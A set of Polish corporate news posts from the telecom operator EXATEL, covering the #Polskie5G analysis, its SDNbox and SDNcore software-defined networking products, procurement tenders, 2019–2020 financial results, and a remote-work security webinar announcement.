Zakończenie prac nad raportem ze wstępnej analizy dla #Polskie5G

Sygnatariusze „Memorandum of Understanding” – porozumienia zawartego 28 października 2019 roku w sprawie opracowania modelu biznesowego dla spółki #Polskie5G – zakończyli prace nad analizą wstępną dla tego projektu. Raport podsumowujący zrealizowane prace zawiera trzy modele wykonalności dla budowy jednolitej sieci w technologii 5G w paśmie 700 MHz. Modelowanie obejmowało aspekty ekonomiczne oraz techniczne, w tym planowanie homogenicznej sieci radiowej na terytorium całego kraju, analizę sposobu współdzielenia infrastruktury i zasobów oraz możliwość wykorzystania #Polskie5G na potrzeby Bezprzewodowej Sieci Łączności Specjalnej.  Prace prowadzone były przez zespół roboczy złożony z przedstawicieli EXATEL S.A., PFR S.A, Polkomtel Sp. z o.o. (operatora sieci Plus), P4 Sp. z o.o. (operatora sieci Play), Orange Polska S.A. oraz T-Mobile Polska S.A. ze wsparciem doradczym spółek NetWorkS! Sp. z o.o. oraz Accenture Sp. z o.o.

Wspólnie wypracowany raport z analizy wstępnej dla #Polskie5G w paśmie 700 MHz został przekazany Prezesowi Rady Ministrów.

 

 

SDNcore – charakterystyka produktu

Autorem tekstu jest Piotr Makulec
Kierownik ds. Strategicznych Inicjatyw Technologicznych; Product Owner SDNbox i SDNcore w EXATEL

Idea SDN (ang. Software-Defined Networking, sieć definiowana programowo) znana jest od 2007 roku dzięki Uniwersytetowi Stanforda w USA. Dziś, po wielu latach pracy społeczności międzynarodowej tj. naukowców, programistów czy w końcu firm IT i telekomunikacyjnych, technologia ta z rozpędem zdobywa globalny rynek. Według danych Global Market Insights w 2018 roku globalny rynek SDN wart był 8 miliardów dolarów. Do 2025 roku wartość ta wzrośnie ponad 12-krotnie i sięgnie 100 miliardów dolarów. To oznaczałoby, że wskaźnik CAGR (z ang. Compound Annual Growth Rate, skumulowany roczny wskaźnik wzrostu) wynosiłby ponad 40%! Skąd taki wzrost? Odpowiedź jest prosta – definiuje ją rozwój technologii telekomunikacyjnych. Mowa tutaj o liczbie urządzeń mobilnych, Internecie Rzeczy (IoT, Interent of Things). O rozwiązań chmurowych czy wchodzącej w nasze życie technologii 5G. A skoro świat zmienia się tak szybko, to za tym musi nadążać i technologia, dzięki której globalna sieć w ogóle funkcjonuje. To będzie możliwe dzięki rozwiązaniom opartym na idei SDN. Technologii, którą właśnie dziś tworzymy w EXATEL.

Czym jest SDNcore

Platforma SDNcore to drugie już rozwiązanie opracowywane w EXATEL. Dla przypomnienia – pierwsze to SDNbox, który pozwala stworzyć elastyczną, bezpieczną i wysokowydajną infrastrukturę zarówno w warstwie agregacyjnej sieci operatora, jak i na styku sieci klienta [CE – Customer Edge /CPE – Customer Premises Equipment]. SDNcore to komplementarne do niego rozwiązanie. Tym razem stworzone z myślą o operatorach telekomunikacyjnych, którzy zarządzają rozległą siecią światłowodową. SDNcore ma działać w kluczowych punktach sieci transportowej, czyli w warstwach agregacyjnej oraz szkieletowej.

Miejsce działania urządzenia to nie jedyna różnica względem SDNbox. Urządzenie SDNcore umożliwi także realizowanie usług telekomunikacyjnych klientom wymagającym dużych przepływności – nawet 100Gb/s oraz wymianę ruchu IP w punktach wymiany ruchu IXP.

SDNcore – gdy liczy się przepustowość

SDNcore projektujemy z myślą o potrzebach operatorów takich jak EXATEL. Urządzenie to wyposażymy w co najmniej 12 portów 100GE oraz 8 portów 10GE. To pozwoli na agregację ruchu z urządzeń brzegowych i na budowanie rozległej sieci transportowej w oparciu o interfejsy 100GE, a także na terminowanie usług klienckich o wysokiej przepływności. SDNcore wspierać będzie funkcjonalności synchronizacji czasu i fazy transmisji. To ma szczególne znaczenie w infrastrukturze dedykowanej dla technologii komórkowych.

Automatyzacja utrzymania

W SDNcore liczy się efektywność. Dlatego sieć SDN będzie działać w sposób zautomatyzowany. W praktyce oznacza to, że m.in. procesy wdrażania urządzeń SDNcore projektowane są z myślą o jak najmniejszym bezpośrednim udziale serwisanta (ZTP, z ang. Zero Touch Provisioning). Ponadto wspierane przez rozwiązanie usługi sieciowe takie jak usługi Carrier Ethernet zgodnie z MEF (ang. Metro Ethernet Forum), routing czy szyfrowane tunele VPN będą wdrażane w sposób deklaratywny, a nie jak w sieciach opartych o urządzenia tradycyjne, imperatywny. Chodzi o to, że zamiast definiować sposób realizacji usługi, pewnych sekwencji kroków prowadzących do uzyskania pożądanego efektu, administrator opisuje samo rozwiązanie, a sterownik już wie, jak skonfigurować infrastrukturę „pod spodem”, aby np. usługa E-LINE została zestawiona pomiędzy dwoma urządzeniami końcowymi.

Orkiestracja usług SDNcore

Elastyczność konfiguracji urządzeń SDNcore, zarządzania siecią i usługami zostanie wyniesiona na nowy poziom. Nową funkcjonalnością jest orkiestracja (ang. Orchestration) usług dająca możliwość zarządzania cyklem ich życia oraz pozwalająca na przetwarzanie informacji o sieci i usługach. Dzięki orkiestracji łączone są ze sobą różne funkcje w celu utworzenia kompleksowej i skoordynowanej z zasobami usługi w rozproszonym środowisku sieciowym.

Pozwala to operatorowi m.in. na efektywne planowanie i wykorzystanie istniejących zasobów sieciowych. Zapewnia także usprawniony proces konfigurowania usługi skupiający się na intencji wdrożenia (CO ma zostać wdrożone?), a nie na szczegółach konfiguracji urządzeń (JAK ma zostać wdrożone?). Orkiestracja usług, na podstawie danych pozyskanych za pomocą technik telemetrii, pozwoli na wdrożenie w przyszłości automatycznej analityki przyczyny awarii, co przyczyni się do zwiększenia dostępności usług sieciowych.

Network slicing w pełnym zakresie

Platforma umożliwia wprowadzenie zupełnie nowej grupy usług z zakresu wirtualizacji sieci. Po utworzeniu homogenicznej sieci SDN za pomocą urządzeń SDNbox i SDNcore, zarządzanej przez sterownik SDN, możliwe będzie tworzenie sieci wirtualnych na bazie jednej infrastruktury fizycznej. Wirtualizacja sieci, w nomenklaturze 5G określana jako network slicing, umożliwia wydzielenie odizolowanych sieci na potrzeby usług sieciowych o różnej charakterystyce ruchu czy wymaganiach QoS (ang. Quality of Service – jakość usługi). To pozwoli na tworzenie nowych, nieosiągalnych obecnie usług jak choćby NaaS (ang. Network as a Service – sieć jako usługa). W praktyce klient otrzymuje narzędzia oraz API do zarządzania elementami sieci oraz sterowania ruchem sieciowym w ramach zamówionej sieci wirtualnej. Czy tego typu usługi są w ogóle potrzebne? Tak! Mogłoby z nich korzystać np. państwo tworząc swoją własną Bezprzewodową Sieć Łączności Specjalnej na potrzeby wszystkich rodzajów służb ratowniczych.

SDNcore – urządzenie takie jak chcesz

Ogromną zaletą platformy jest jej reprogramowalność. Dzięki użyciu nowoczesnych technologii możliwe będzie dodanie nowych funkcjonalności i usług bez konieczności wymiany urządzeń, a nawet bez konieczności wizyty serwisanta. Utworzone rozwiązanie będzie ponadto podstawą do implementacji kolejnych rozwiązań teleinformatycznych w przyszłości. Również tych, których dziś jeszcze nie wymyśliliśmy.

Przycisk kierujący na stronę poświęconą programom SDN EXATEL Przycisk kierujący na stronę poświęconą rekrutacjom w EXATEL

 

SDNbox – charakterystyka produktu

Autorem tekstu jest Piotr Makulec
Kierownik ds. Strategicznych Inicjatyw Technologicznych; Product Owner SDNbox i SDNcore w EXATEL

W sieciach – zarówno operatorów telekomunikacyjnych, jak i przedsiębiorców – obserwujemy coraz większą liczbę użytkowników, w szczególności tych mobilnych. Powszechne staje się wykorzystanie publicznych i prywatnych chmur obliczeniowych, które przyciągają niemal nieograniczonymi, elastycznymi zasobami. Nowe trendy, takie jak 5G, Internet of Things (IoT) oraz ciągły rozwój rozwiązań w warstwie sieciowej w chmurach publicznych stawia przed technologią nowe wyzwania.
Dziś każdy – czy to producent rozwiązań sieciowych, dostawca usług czy organizacja działająca w Internecie – chce zapewnić sobie przewagę rynkową. Musi działać szybciej, sprawniej i bezpieczniej. A zmiany trzeba wdrażać właściwie z dnia na dzień. Dlatego wyzwania takie jak czas wdrożenia (Time To Market) czy elastyczność zyskują zupełnie nowe znaczenia.

Aby móc szybko reagować na zmienne otoczenie – trzeba mieć odpowiednie narzędzia. Trzeba móc szybko modyfikować swoje usługi i udostępniać je swoim partnerom. Dotychczas było to trudne. Ograniczeniem był sam sprzęt, gdzie nawet drobna zmiana mogła oznaczać wymianę całego urządzenia. Za sprawą technologii SDN tego typu sytuacja przejdzie do historii.

SDN i NFV rozwiązaniem kluczowych problemów telekomunikacji XXI wieku

Obecnie konieczne staje się zapewnienie wysokowydajnej, elastycznej i bezpiecznej infrastruktury sieciowej. Potrzebne są rozwiązania, które pozwolą w prosty i efektywny sposób dokonywać niemal natychmiastowych zmian. Zmian, które rozpropagują się niemal niezauważalnie w całej infrastrukturze. Realizację tych potrzeb zapewniają właśnie rozwiązania SDN (ang. Software-defined Networking) i NFV (ang. Network Function Virtualization). Mechanizmy, które są podstawą tworzonych w EXATEL urządzeń sieciowych. Jednym z nich jest SDNbox – polska programowalna platforma sprzętowa dla sieci telekomunikacyjnych.

Po co SDNbox

Platforma SDNbox pozwala zarówno operatorom telekomunikacyjnym jak i innym klientom biznesowym stworzyć elastyczną, bezpieczną i wysokowydajną infrastrukturę zarówno w warstwie agregacyjnej sieci operatora jak i na styku sieci klienta [CE – Customer Edge /CPE – Customer Premises Equipment].  Jest to rozwiązanie, które tworzymy w oparciu o ogólnodostępne komponenty i interfejsy sieciowe które może realizować szereg wybranych funkcje sieciowych definiowanych programowo takich jak: router, przełącznik, szyfrator, sonda, firewall, anty-DDoS czy Multi-Access Edge Computing (MEC).

OpenAPI czyli otwartość na inne rozwiązania

Bardzo ważną rolę w rozwoju Software Defined Networking odgrywają otwarte standardy i protokoły (m.in. OpenFlow, Netconf, REST API). Dlatego w naszych rozwiązaniach kładziemy duży nacisk na ich stosowanie. Chcemy m.in. uzyskać możliwość łatwej integracji z innymi rozwiązaniami czy oprogramowaniem. A docelowo chcemy dać globalnej społeczności open source możliwość tworzenia własnych komponentów, które będę mogły integrować się z naszym rozwiązaniem.

Wielofunkcyjny oznacza efektywniejszy

SDNbox umożliwi uruchomienie wielu funkcjonalności na jednym urządzeniu. I to bez konieczności inwestowania w kolejne, dedykowane rozwiązania sprzętowe. Dla użytkowników to mniej urządzeń w szafie rackowej. A to oznacza prostszą architekturę sieci, mniejsze zużycie energii oraz redukcję kosztów związanych z zarządzaniem i utrzymaniem sieci. Kolejną zaletą SDNbox jest możliwość lepszego wykorzystania mocy obliczeniowej urządzenia dzięki dynamicznemu przydzielaniu zasobów i równoważeniu obciążenia ruchem sieciowym konkretnych relacji. Ta funkcjonalność jest szczególnie ważna dla operatorów telekomunikacyjnych, którym zależy na jakości świadczonych przez siebie usług.

SDNbox a bezpieczeństwo

Urządzenia sieciowe muszą być nie tylko wydajne, ale i bezpieczne. W SDNbox będzie można zaimplementować, poza bazową funkcjonalnością Firewall’a, funkcjonalność anty-DDoS chroniącą przed atakami wolumetrycznymi oraz Sondę pasywnie wykrywającą bieżące zagrożenia na bazie dostępnych sygnatur. Na dostarczonym Hypervisorze, wramach dostępnych zasobów obliczeniowych, możliwe jest uruchamianie własnych rozwiązań typu Virtual Network Function w środowisku Network Function Virtualization (NFV). A dzięki wspomnianym już OpenAPI funkcjonalności SDNbox mogą być w przyszłości rozszerzane o nowe usługi.

SDNbox jako skalowalna platforma wirtualna

Tworzone przez nas rozwiązanie może pełnić niemal dowolną funkcję. Jak? Wystarczy, że oprogramowanie sterujące usługą będzie mogło pracować na platformie wirtualnej. Potrzebujemy dodatkowe proxy – instalujemy oprogramowanie realizujące tą funkcjonalność. Chcemy zbudować ‘captive portal’? Nic nie stoi na przeszkodzie. Dostarczana moc obliczeniowa SDNbox pozwala na realizację wielu funkcjonalności. A to nie wszystko. Za wzrostem potrzeb może iść przeskalowanie platformy sprzętowej (IaaS) tak, by sprostała większemu zapotrzebowaniu na moc obliczeniową poprzez np. zwiększenie pojemność zasobów dyskowych, pamięci RAM itp.

SDNbox to oszczędności

Różnorodność i wielofunkcyjność SDNbox powoduje obniżenie kosztów – zarówno CAPEX, jak i OPEX. To było i jest kluczowym argumentem dla każdej organizacji. Można to wytłumaczyć na przykładzie EXATEL – polskiego operatora telekomunikacyjnego, który naturalnie będzie pierwszym odbiorcą SDNbox. Dzięki zastosowaniu ideologii Software-defined Networking środowisko sieciowe w sposób niemal natychmiastowy dostosowuje się do wymagań klienta. Wykorzystanie układów programowalnych (FPGA, field-programmable gate array) daje wysoką elastyczność funkcjonalną urządzenia przy zachowaniu jego dużej wydajności. A jeśli weźmiemy pod uwagę skalę działalności EXATEL – ponad 20 500 km sieci światłowodowej i tysiące działających w naszej sieci urządzeń – kalkulacja nie pozostawi złudzeń co do efektywności kosztowej rozwiązań SDN.

 

Przycisk kierujący na stronę poświęconą programom SDN EXATEL Przycisk kierujący na stronę poświęconą rekrutacjom w EXATEL

 

SDNcore – przetarg na opracowanie OMU i warsztaty demonstracyjne

SDNcore to autorskie urządzenie działające zgodnie z ideą SDN (z ang. Software-Defined Networking – sieć definiowana programowo). Budujemy je w ramach prowadzonych przez projektów badawczo-rozwojowych. Poszukujemy partnera, który wesprze nas w jednym z etapów tego projektu i opracuje OMU (ang. Operation and Maintenance Unit). Dodatkowo poprowadzi także warsztaty demonstrujących poprawność jego działania z prototypowymi podsystemami SDNcore.

 

Przedmiot zapytania dla SDNcore

Opracowanie OMU (ang. Operation and Maintenance Unit) wraz z przeprowadzeniem warsztatów demonstrujących poprawność jego działania z prototypowymi podsystemami zintegrowanymi w zakresie podstawowej funkcjonalności w ramach projektu „SDNcore – wysokowydajna i skalowalna programowalna platforma agregująca ruch sieciowy”.

 

Dodatkowe informacje

Szczegółowe informacje związane z zapytaniem ofertowym w ramach projektu “SDNcore – wysokowydajna i skalowalna programowalna platforma agregująca ruch sieciowy” znajdują się w ogłoszeniu o rozpoczęciu postępowania zakupowego prowadzonego w trybie zapytania ofertowego (zgodnie z zasadą konkurencyjności) – Konkurs Ofert Nr 12.2020 (1,1 MB, PDF).

 

Termin składa ofert

Czas na składnie ofert upływa 8 lipca 2020 roku o godzinie 12.00.

 

Czym jest SDNcore

SDNcore to wysokowydajna i skalowalna programowalna platforma agregująca ruch sieciowy. Urządzenie tworzone z myślą o operatorach sieci telekomunikacyjnych. Będzie zbudowane zgodnie z filozofią SDN (z ang. Software-Defined Networking – sieć definiowana programowo). Urządzenie będzie funkcjonowało w kluczowych punktach sieci transportowej, czyli w warstwach agregacyjnej oraz szkieletowej. Będzie mogło współpracować z innymi tego typu rozwiązaniami, takimi jak budowany przez EXATEL SDNbox.

Software-Defined Networking (SDN) – technologia przyszłości

Rewolucja programowalnych sieci nadchodzi. Czym jest więc Software-Defined Networking (w skrócie SDN, programowalna sieć komputerowa)? Czemu dopiero dziś ta idea wchodzi w świat rozwiązań telekomunikacyjnych? W końcu SDN jest kluczem do wydajnego przepływu danych w Internecie. A Internet to informacje rozrzucone po całym świecie, które połączone są światłowodami. A to właśnie nimi już wkrótce będzie zarządzała technologia SDN.

Czym jest SDN

SDN to nowa koncepcja budowy sieci telekomunikacyjnych. Utworzona w 2007 roku na Uniwersytecie Stanforda w USA. I od tamtej pory rozwijana przez społeczność międzynarodową: uniwersytety i firmy telekomunikacyjne.

Potrzeba utworzenia nowej technologii wzięła się jak zwykle z obserwacji problemów, jakie przeżywa technologia obecnie stosowana. Współczesne urządzenie telekomunikacyjne to wysokospecjalistyczna skrzynka o bogatym zestawie funkcji. Zaprojektowany w taki sposób, aby zadowolić najwykwintniejsze telekomunikacyjne gusta. Dla każdego coś miłego. Jeden klient chce wirtualną sieć prywatną (VPN), inny routery i bezpieczne łącza do sieci Internet. Jeszcze inny zaporę ogniową czy inne elementy systemu bezpieczeństwa. Każda funkcja to inna skrzyneczka. Problem zaczyna się, gdy potrzeby klientów się zmieniają, a we współczesnej rzeczywistości gospodarczej jedyną pewną i nieuchronną rzeczą jest zmiana. Nowe protokoły, których podczas projektowania skrzyneczki jeszcze na świecie nie było. Potrzeba całkowitej zmiany funkcjonalności. Potrzeba uruchomienia nowej usługi. Wiele z tych potrzeb wymaga za każdym razem nowej skrzyneczki.

Szybka reakcja

Urządzenie sieciowe programowalnej sieci realizuje tylko działania wymagające szybkiej reakcji (sterowanie ruchem pakietów sieciowych). W filozofii SDN urządzenie jest zarządzalne: jego konfigurację można zmieniać w szerokim zakresie. A więc nie biegamy po mieście ze skrzyneczkami. My siedzimy, skrzyneczka stoi, a między nami biegają pakiety sieciowe, którymi realizujemy całkowitą rekonfigurację usługi czy uruchomienie nowej.

Centralne zarządzanie siecią

Zarządzanie siecią, od którego zależy ruch pakietów oraz kształt usług udostępnianych przez sieć jest przeniesione z urządzenia do węzła centralnego – sterownika sieci, który może zarządzać grupą urządzeń programowalnej sieci komputerowej.

Uniwersalne zastosowanie

Urządzenia SDN są bardziej uniwersalne, ponieważ do zmiany usług sieciowych, która w urządzeniach klasycznych wymagałaby rekonfiguracji lub wymiany urządzeń, w filozofii SDN wystarczy zarządzać węzłem centralnym, który wydaje urządzeniom polecenia zmiany konfiguracji. Ciągłe monitorowanie stanu urządzeń, które jest istotą sieci Software-Defined Networking, utrudnia atak na te urządzenia. Możliwość zmiany funkcji urządzenia i oferowanych przez nie usług sieciowych pozwala uniknąć wymiany urządzeń i jak najlepiej spożytkować ich zasoby. Dzięki temu sieć oparta na tej filozofii jest bardziej elastyczna i śmiało oczekuje na nowe wyzwania. Czas od pomysłu na usługą do jej uruchomienia, mierzony parametrem TTM (time to market) skraca się, co umożliwia klientom szybsze reagowanie na potrzeby rynku.

Otwarty standard

Bardzo ważną rolę w rozwoju Software-Defined Networking odgrywają otwarte standardy, takie jak OpenFlow. Dzięki nim do zarządzania urządzeniami można używać otwartych projektów takich jak Open vSwitch czy ONOS. EXATEL chętnie wspiera społeczność międzynarodową (opublikowaliśmy ostatnio na otwartej licencji bibliotekę libnetflow9 do analizy ruchu sieciowego).

Technologia rozwojowa

Filozofia SDN jest pokrewna do filozofii Internetu Rzeczy (IoT): wymiany usług na skraju sieci telekomunikacyjnej. Niewiele jest technologii, które potrafiłyby szybko zwiększyć dostępność usług telekomunikacyjnych w odpowiedzi na takie zjawiska w świecie IoT jak ogólnopolski zlot pralek automatycznych, korek na autostradzie czy mecz piłkarski użytkowników pomp insulinowych.

Technologia SDN jest również przygotowana do przyjęcia technologii 5G, w której operator gwarantuje nie tylko dostępność usługi ale zamówiony przez klienta standard, który umożliwia generowanie korzyści biznesowych w sposób szybki, bezpieczny, ale i dopasowany do potrzeb technologicznych danej usługi (na przykład dla standardu Przemysł 4.0 wymagane może być zdalne sterowanie systemem przemysłowym, które wymaga  ultraszybkich czasów transmisji pakietów).

Warunkiem sukcesu technologii Software-Defined Networking jest wdrożenie i popularyzacja elastycznych, szybkich i bezpiecznych urządzeń sieciowych, zgodnych ze standardem SDN. Utworzenie platformy tego typu urządzenia otwiera drogę do rozwoju innowacji w zakresie komunikacji sieciowej: mimo tylu lat rozwoju internetu, wciąż istnieją nierozwiązane problemy w zakresie zarządzania ruchem pakietów sieciowych i wciąż jest do rozwiązania wiele wyzwań, aby usługi internetowe były dostarczane do konsumenta szybko, efektywnie i bezpiecznie.

SDN w EXATEL

W praktyce SDN oznacza to telekomunikacyjną rewolucję. Zmianę, w której EXATEL bierze czynny udział jako producent technologii. Środek ciężkości urządzeń SDN przesunął się ze sprzętu na oprogramowanie. Posiadanie własnej platformy sprzętowej jest warunkiem koniecznym, ale wartość biznesowa urządzenia jest dostarczana w dużej części przez programistów. Dzięki filozofii SDN firmy takie jak EXATEL, które samodzielnie piszą oprogramowanie podejmą wyzwanie stworzenia własnych urzadzeń mogą tworzyć rozwiązania na najwyższym światowym poziomie. Mowa tutaj o SDNbox i SDNcore. Rozwiązaniach, które w pierwszej kolejności będą wykorzystane w drugiej co do wielkości sieci światłowodowej w Polsce. A to dopiero początek.

 

 

Dobre wyniki finansowe EXATEL S.A. za 2019 rok oraz 1 kwartał 2020 roku

  • EXATEL podsumował wyniki finansowe za 2019 rok.

  • Główne wskaźniki takie jak EBITDA czy marża po kosztach bezpośrednich wzrosły kolejny rok z rzędu. Dzięki temu wynik netto był lepszy od zakładanego o 0,4 mln złotych.

  • Utrzymujący się trend wzrostowy widać także w przedstawionych wynikach finansowych za 1 kwartał 2020 roku.

Zarząd EXATEL podsumował wyniki finansowe spółki za 2019 rok. W ubiegłym roku EBITDA polskiego operatora telekomunikacyjnego wyniosła 56,3 mln złotych i była wyższa o 24% względem 2018 roku. O 9% rok-do-roku wzrosła także marża po kosztach bezpośrednich, która na koniec 2019 roku wyniosła 176,4 mln złotych. To wynik długofalowej strategii, której celem jest stanie się dochodowym dostawcą unikalnych, bezpiecznych rozwiązań teleinformatycznych w oparciu o własną sieć światłowodową dla biznesu, sektora publicznego oraz innych operatorów.

Bliżej rentowności Spółki

Utrzymujący się do 2017 roku wzrost EBITDA oraz wysokości uzyskiwanej marży bezpośredniej przełożyły się pozytywnie na wynik netto. W ubiegłym roku Spółka znacząco zmniejszyła stratę netto rok rocznie o 8,5 mln złotych i zakończyła rok księgowy z wynikiem -12,1 mln złotych. Wynik ten był lepszy od planowanego o 0,4 mln złotych.

Podstawą naszego rozwoju jest licząca ponad 20 500 kilometrów sieć światłowodowa oraz stały rozwój naszej oferty w kraju, jak i za granicą. W zeszłym roku otworzyliśmy kolejny już w punkt udostępniania naszych usług – tym razem w Pradze. Zabezpieczyliśmy ważne dla nas połączenie tranzytowe pomiędzy Frankfurtem a Warszawą, zapewniając naszym klientom jeszcze lepsze standardy obsługi. To z kolei przełożyło się na 45% wzrost zafakturowanych przez nas usług transmisji danych do Frankfurtu – powiedział Nikodem Bończa Tomaszewski, prezes Zarządu EXATEL.

Lepsze od zakładanych wyniki finansowe wynikały także z rozwoju produktów i usług oferowanych przez narodowego operatora telekomunikacyjnego. Wśród najważniejszych należy wymienić usługi łączności satelitarnej, nowe produkty w ofercie telekomunikacyjnej, takie jak Wavelenght (prywatne, wysokoprzepustowe połączenie punkt-punkt w oparciu o działającą w sieci EXATEL infrastrukturę DWDM), czy rozwiązania cyberbezpieczeństwa, takie jak Security Operations Center, audyty oraz inne rozwiązania bezpieczeństwa IT.

73% przychodów EXATEL z rynku komercyjnego

Głównym źródłem przychodu Spółki pozostaje niezmiernie rynek komercyjny. Wysokość wszystkich przychodów ze sprzedaży spadła o 4% w stosunku do 2018 roku i wyniosła 366,9 mln złotych, ale równocześnie nastąpił wzrost rentowności sprzedaży.

Spadek ten to wynik optymalizacji naszej działalności sprzedażowej – głównie w obszarze hurtu głosu. W 2019 odnotowaliśmy wzrost marży o 15,1 mln złotych, co oznacza wzrost rentowności sprzedaży o 6%. Jako firma dążąca do uzyskania dodatniego wyniku netto bacznie przyglądamy się każdemu realizowanemu przez nas projektowi. Konkurujemy przede wszystkim jakością świadczonych usług oraz wyśrubowanymi standardami ich dostępności przy zachowaniu rozsądnej ceny. To dzięki temu staliśmy się zaufanym partnerem m.in. największych globalnych operatorów, sektora finansowego i międzynarodowych korporacji. I dzięki temu o 7% zwiększyliśmy w 2019 roku bazę naszych klientów – dodaje Nikodem Bończa Tomaszewski.

O dużej efektywności kosztowej polskiego operatora telekomunikacyjnego świadczy także wskaźnik EBITDA na pracownika EXATEL. W 2019 roku wyniósł on 140,99 tys. złotych i był wyższy o 24% w stosunku do roku poprzedniego.

Trend wzrostowy utrzymany w 1 kwartale 2020 roku

Pierwsze 3 miesiące bieżącego roku potwierdzają widoczny od 2017 roku trend. Na koniec marca 2020 roku, zgodnie z Krajowym Standardem Rachunkowości, EBITDA Spółki wyniosła 15,2 mln złotych i była wyższa o 7% od planowanej. Wysokość marży po kosztach bezpośrednich wyniosła z kolei 45,7 mln złotych i była wyższa od planowanej o 0,17%. Dzięki temu wynik netto wyniósł -1,8 mln złotych – lepiej o 0,8 mln złotych od wartości planowanej. Przychody ze sprzedaży zamknęły się kwotą 86,3 mln złotych.

Od początku tego roku intensywnie pracujemy nad dalszym rozwojem naszej firmy. W marcu otworzyliśmy nowy punkt wymiany ruchu IP w Paryżu, chwilę później kolejny w Pradze. Dzięki modernizacji połączenia Frankfurt – Warszawa dysponujemy obecnie najmniejszym na rynku opóźnieniem na tej trasie. To usługa niezwykle ważna dla tranzytu danych na linii wschód – zachód Europy, w szczególności dla instytucji finansowych. Oferujemy nowe usługi transmisji danych dla regionu APAC (Azja i Pacyfik) oraz rozszerzamy naszą obecność na rynkach Ameryki Południowej – podkreśla Rafał Magryś wiceprezes Zarządu EXATEL.

Polski operator telekomunikacyjny rozwija także swoją dotychczasową działalność, jak choćby w zakresie łączności międzynarodowej dla biznesu, czy oferowanych przez siebie rozwiązań satelitarnych. Stale też wprowadza nowe usługi, na przykład SOC Assistance, wideokonferencje realizowane w oparciu o własną infrastrukturę czy usługi pakietowe kierowane do jednostek samorządu terytorialnego.

Ten rok będzie także pierwszym, w którym będziemy dysponowali całkowicie własnym rozwiązaniem. Mówię tutaj o naszym autorskim antyDDoS TAMA. Projekt badawczo-rozwojowy zakończyliśmy pod koniec 2019 roku. Od początku tego roku TAMA działa już w naszej sieci. Dzięki temu zbieramy nowe doświadczenia i nieustannie ją rozwijamy. Liczę, że rozwiązanie to będzie miało swój wydatny udział w dobrych wynikach na koniec 2020 roku – zaznacza Rafał Magryś.

O EXATEL

EXATEL to polski operator telekomunikacyjny oraz dostawca usług teleinformatycznych (ICT), cyberbezpieczeństwa oraz łączności satelitarnej. Powstał w 2004 roku w wyniku fuzji spółek Telbank i Tel-Energo. Zbudował i zarządza jedną z największych sieci światłowodowych w Polsce, liczącą ponad 20 500 km. Tworzy rozwiązania dla biznesu, innych operatorów oraz sektora publicznego. Dostarcza transmisję danych we wszystkich polskich bankach komercyjnych i 78 spółkach sektora energetycznego. Zaprojektował i zbudował sieć OST do łączności administracji rządowej. Zarządza połączeniami z 307 operatorami krajowymi i 134 zagranicznymi. Jest obecny w międzynarodowych punktach wymiany ruchu w Londynie, Frankfurcie, Amsterdamie, Moskwie, Kijowie, Pradze i Paryżu. W ramach projektów badawczo-rozwojowych tworzy autorskie rozwiązania teleinformatyczne i cyberbezpieczeństwa, takie jak polski antyDDoS TAMA, SDNbox czy SDNcore. Jest pomysłodawcą projektu #Polskie5G – jednego hurtowego operatora ogólnopolskiej bezprzewodowej sieci łączności mobilnej w standardzie 5G w paśmie 700MHz. Od 2017 roku należy w pełni do Skarbu Państwa, jest nadzorowany przez Ministra Aktywów Państwowych.

SDNcore – przetarg na dostawę sprzętu komputerowego

SDNcore to całkowicie nowe urządzenie działające zgodnie z filozofią SDN (z ang. Software-Defined Networking – sieć definiowana programowo), które tworzymy w ramach projektów badawczo-rozwojowych. Dlatego poszukujemy firmy, która dostarczy nam niezbędny sprzęt komputerowy potrzebny do realizacji naszego projektu.

 

Przedmiot zapytania dla SDNcore

Dostawa komputerów przenośnych, stacji dokujących oraz monitorów na potrzeby realizacji projektu badawczo-rozwojowego SNDcore.

 

Dodatkowe informacje

Szczegółowe informacje związane z zapytaniem ofertowym w ramach projektu “SDNcore – wysokowydajna i skalowalna programowalna platforma agregująca ruch sieciowy” znajdują się w zaproszeniu do składania ofert (1,6 MB, PDF).

 

Termin składa ofert

Czas na składnie ofert upływa 8 czerwca 2020 roku o godzinie 13.00.

 

Czym jest SDNcore

To uruchomiony 1 maja 2020 roku trzeci już kolejny projekt badawczo-rozwojowy. Jego celem jest opracowanie polskiego innowacyjnego urządzenia sieci agregacyjnej i szkieletowej, którego powstanie umożliwi dynamiczny rozwój sieci 5G. Będzie mogło współpracować z innymi tego typu rozwiązaniami, takimi jak budowany przez EXATEL SDNbox.

Realizacja projektu wymaga uruchomienia współpracy w zakresie elektroniki o wysokiej przepływności danych, na najwyższym światowym poziomie. Więcej informacji o projekcie można znaleźć w informacji “EXATEL zbuduje SDNcore“.

SDNcore – informacje o wyborze najkorzystniejszej oferty

Zakończyliśmy wybór najkorzystniejszej oferty na opracowanie procesu projektowania układów elektronicznych oraz technologicznych  wymagań produkcyjnych pod kątem zapewnienia integralności elektrycznej w ramach projektu „SDNcore”. Szczegóły znajdują się w załączonej informacji:

Informacja o wyborze najkorzystniejszej oferty_21.05.2020 (PDF, 344KB)

Szczegóły samego postępowania dostępne są tutaj.

 

Czym jest SDNcore

To nowy projekt B+R EXATEL, który uruchomiliśmy 1 maja 2020 roku. Jego realizację zaplanowaliśmy na lata 2020-2023. Za cel postawiliśmy sobie opracowanie polskiego innowacyjnego urządzenia sieci agregacyjnej i szkieletowej. Jego powstanie umożliwi dynamiczny rozwój sieci 5G. Do realizacji tego projektu chcemy zaangażować także inne podmioty. Szczególnie w zakresie przygotowania elektroniki o wysokiej przepływności danych. I to na najwyższym światowym poziomie.

Więcej o programie SDNcore można przeczytać tutaj.

 

Bezpieczeństwo pracy zdalnej – cykl bezpłatnych webinarów

Przyśpieszona transformacja cyfrowa wymuszona przez pandemię koronawirusa dotyczy wszystkich – zarówno biznesu, jak i jednostek samorządu terytorialnego. Praca zdalna, wideokonferencje, nowe mechanizmy obiegu dokumentów – organizacje wdrażały to pod presją czasu. Większość z tych rozwiązań już weszło do codziennego użytku. To oznacza, że przetrwają powrót do „nowej rzeczywistości” i będą dalej wykorzystywana w naszej pracy. Dlatego warto teraz odpowiedzieć sobie na pytanie – czy nie zapomnieliśmy również o ich bezpieczeństwie?

Bezpieczeństwo pracy zdalnej

